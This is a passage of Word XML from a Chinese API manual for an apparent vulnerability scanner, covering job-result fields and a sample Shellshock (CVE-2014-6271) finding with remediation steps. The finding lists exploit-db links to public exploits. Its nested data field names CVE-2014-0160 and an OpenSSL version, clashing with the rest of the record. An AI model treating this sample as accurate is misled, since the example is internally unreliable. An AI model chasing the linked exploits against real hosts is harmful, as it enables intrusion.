            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="362BAEFF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>executeJobId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="44E53877" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="28B4002E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>执行</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>jobId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1CB3AD47" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="33865611" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>executeStatus</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="43A09C4C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0398EC73" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>执行状态; 0：未开始执行，1：排队执行，2：正在执行，3：执行成功，4：执行失败</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2C80FCBB" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="340B4ACB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>lastExecuteTime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="30412AF5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4F19D158" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>最后执行时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0DED8CD9" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B6C4AA7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>duration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3478D5C4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1AAD85AA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>执行耗时秒数</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1F068EB7" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D411C3F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>vulCount</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="75E59EA9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0504AA51" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>漏洞数量</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4F29AA1B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="599DB92D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>hostCount</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="12D5E41E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="329D1489" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机数</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3228C133" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C6F9B96" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>taskCount</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="30B091CD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="00D623D1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>检测项数</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2733558F" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="608884D0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>failedHostCount</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="705C093F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="15DBAAC7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>失败主机数</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="59CFD54B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="77660A70" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>successHostCount</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="20AB736F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6C782FD4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>成功主机数</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="15369310" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="249" w:name="_Toc115166199"/>
      <w:bookmarkStart w:id="250" w:name="作业执行漏洞结果查询"/>
      <w:bookmarkEnd w:id="248"/>
      <w:r>
        <w:t>作业执行漏洞结果查询</w:t>
      </w:r>
      <w:bookmarkEnd w:id="249"/>
    </w:p>
    <w:p w14:paraId="69B4871B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DAFFCC9"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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>result_detail</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="73818D06"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74"/>
        <w:gridCol w:w="896"/>
        <w:gridCol w:w="4087"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="73C8676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C0C0F7F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="05BB5FC5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0055B9E0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3E86F60F" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A3451AE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>jobId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="742E7851" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="35CAC226" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>必传</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1C4650A8" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5A9A7783" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>jobType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="72E7C32A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="403715A6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>必传，作业类型：1：全局作业 2：用户作业</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5090FE38" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6575853B"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poc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/job/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>result_detail</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>{"jobId":"5b8dfe107d761b471404112d","jobType":2}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68850EEF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539AD33F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "rows": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vulId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "QT042014001964",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vulName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "Bash远程代码执行漏洞(CVE-2014-6271)",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            "apps": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "bash"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "desc": "Shellshock，又称</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Bashdoor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>，是在Unix中广泛使用的Bash shell中的一个安全漏洞，首次于2014年9月24日公开。许多互联网守护进程，如网页服务器，使用bash来处理某些命令，从而允许攻击者在易受攻击的Bash版本上执行任意代码。这可使攻击者在未授权的情况下访问计算机系统。该漏洞会影响目前主流的Linux和Mac OSX操作系统平台，包括但不限于</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Redhat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>、CentOS、Ubuntu、Debian、Fedora、Amazon Linux、OS X 10.10等平台。",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>restartOpts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 3,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>publicDate</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "2014-09-24 00:00:00",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>firstCheckTime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "2018-08-02 15:30:31",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "family": 4,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "severity": 4,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>checkInfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "版本比对检测原理：检查当前系统中Bash版本是否在受影响版本内|版本比对检测结果：|POC检测原理：检查当前系统中Bash版本是否在受影响版本内|POC检测结果：",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pocCheckInfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "在Bash中，以\"(){\"开头定义的环境变量在命令env中解析成函数后，Bash执行并未退出，而是继续解析并执行shell命令，从而导致漏洞产生。",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>checkResult</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "data": "{\"code\": 0, \"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>execute_type</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\": 3, \"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cve_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\": \"CVE-2014-0160\", \"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>poc_check_result</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\": {\"vuln\": 1, \"code\": 0, \"result\": {\"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vuls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\": [{\"vuln\": 1, \"key\": \"fake value\"}]}, \"error\": null}, \"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>host_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\": \"86e354eb10f147f2\", \"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ver_check_result</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\": {\"vuln\": 1, \"code\": 0, \"result\": {\"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vuls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\": [{\"vuln\": 1, \"version\": \"1.0.1e-fips\", \"home\": \"/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pki</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\"}]}, \"error\": null}}",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>remedDescription</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "升级bash到最新版本，漏洞修复后需要重启bash服务，建议业务不繁</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>忙时修复。使用以下命令升级：   \r\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nRHEL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">/CentOS : </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> yum update -y bash \r\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nUbuntu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> : </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> apt-get update &amp;&amp; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> apt-get install --only-upgrade -y bash",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "kernel": false,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "remote": false,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>localEscalation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": false,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hasExp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": false,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hasPoc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": false,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cvss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "AV:N/AC:L/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Au:N</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/C:C/I:C/A:C",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cvssScore</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 10,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "refs": "CNVD-2014-06345,BID-70103",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>expRefs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "https://cve.mitre.org/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cgi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cvename.cgi?name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=CVE-2014-6271",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pocRefs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "https://www.exploit-db.com/exploits/34879/ \r\nhttps://www.exploit-db.com/exploits/37816/ \r\nhttps://www.exploit-db.com/exploits/38849/ \r\nhttps://www.exploit-db.com/exploits/39918/ \r\nhttps://www.exploit-db.com/exploits/40619/ \r\nhttps://www.exploit-db.com/exploits/40938/ \r\nhttps://www.exploit-db.com/exploits/42938/\r\nhttps://www.exploit-db.com/exploits/36609/\r\nhttps://www.exploit-db.com/exploits/36503/\r\nhttps://www.exploit-db.com/exploits/36504/\r\nhttps://www.exploit-db.com/exploits/35146/\r\nhttps://www.exploit-db.com/exploits/35115/\r\nhttps://www.exploit-db.com/exploits/34766/\r\nhttps://www.exploit-db.com/exploits/34765/",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cves</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "CVE-2014-6271"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            ],</w:t>
      </w:r>
      <w:r>
